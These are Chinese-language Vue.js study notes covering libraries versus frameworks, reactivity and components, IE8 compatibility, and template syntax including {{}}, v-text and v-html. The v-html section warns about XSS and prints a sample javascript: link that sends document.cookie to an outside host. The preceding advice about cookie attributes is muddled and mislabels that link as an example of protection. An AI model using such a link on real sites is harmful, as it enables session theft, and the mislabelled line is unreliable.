>框架 和 庫 的區別 `庫(插件)`：是一種封裝好的特定方法集合，對項目的侵入性較小，提供給開發 者使用，控制權在使用者手中，如果某個庫無法完成某些需求，可以很容易切換到 其它庫實現需求; `框架`：是一套架構，會基于自身特點向用戶提供一套相當完整的解決方案，而且 控制權在框架本身；對項目的侵入性較大，使用者要按照框架所規定的某種特定規 范進行開發，項目如果需要更換框架，則需要重新架構整個項目。 >vue的兩個核心 >1.響應式的數據綁定：當數據發生改變，視圖可以自動更新，可以不用關心dom 操作，而專心數據操作； >2.可組合的視圖組件：把視圖按照功能切分成若干基本單元，組件可以一級一級組 合整個應用形成倒置組件樹，可維護，可重用，可測試； >兼容性 >Vue(2) 不支持 IE8 及以下版本，因為 Vue 使用了 IE8 無法模擬的 ECMAScript 5 特 性。但它支持所有兼容 ECMAScript 5 的瀏覽器。 >Vue 模板語法 * Mustache -- 雙括號語法 >語法格式雙大括號'{{}}',用在html標簽之間，不能寫在標簽屬性中。 >語法中可以使用js表達式，但只限于Vue實例作用域和Vue沙盒白名單，白名單規定了一些全局變量例如Math和Date。 >表達式一些基本表達式，和一些三元運算例如：`{{num + 1}}`、`{{status ? 'succeed' : 'failed'}}`、`{{changeTime()}}`、`{value.replace(/,/g,"")}`。 >不支持流控制例如:`{{ if (ok) { return message } }}` * v-text -- 文本渲染 >v-text 能展示對應data中數據內容，也能在數據基礎上做運算。 >v-text 會把標簽中的內容替換。 * v-html -- html標簽渲染 >將標簽語義化展示在頁面上 >容易產生xss攻擊，請只對可信內容使用 HTML 插值，絕不要對用戶提供的內容使用插值。 >如何防止xss攻擊: >>前端過濾 >>后臺轉義(< > `&lt;` `&gt;`) >>給cookie 加上屬性 http例如: >>`<a href=javascript:location.href='http://www.baidu.com?cookie='+document.cookie>click</a>` >三種將數據渲染到頁面的方法總結 >* `{{}}` 最被常用但是在加載的時候會出現閃爍問題，而且只能把html標簽當字符串渲染； >* `v-text` 雖然沒有數據加載閃爍問題，但是會將標簽中間的數據覆蓋，也不能渲染html格式數據; >* `v-html` 謹慎使用會出現xss攻擊的風險。 http://www.hmoore.net/cyyspring/vuejs/936538